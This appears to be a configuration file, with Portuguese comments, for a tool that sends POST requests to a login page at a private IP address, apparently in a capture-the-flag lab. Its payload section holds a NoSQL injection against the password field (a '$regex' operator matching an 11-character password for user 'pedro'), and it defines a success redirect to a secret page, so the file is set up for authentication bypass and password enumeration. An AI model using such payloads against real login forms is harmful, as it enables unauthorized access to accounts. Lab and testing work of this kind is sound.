[target]
host = "10.10.19.190"
protocol = "http"
path = "/login.php"
port = ""  # Deixe vazio para usar a porta padrão

[request]
method = "POST"
follow_redirects = false

[headers]
content_type = "application/x-www-form-urlencoded"
user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
# Adicione outros headers conforme necessário
# Exemplo: referer = "http://example.com"

[payload]
# Formato dos parâmetros do formulário
type = "form"  # Pode ser "form", "json", ou "raw"
data = """user=pedro&pass[$regex]=^.{11}$&remember=on"""

[output]
show_headers = true
show_body = true
max_body_length = 1000  # Para limitar a saída de corpos grandes

[response]
success = "/sekr3tPl4ce.php"
error = ""
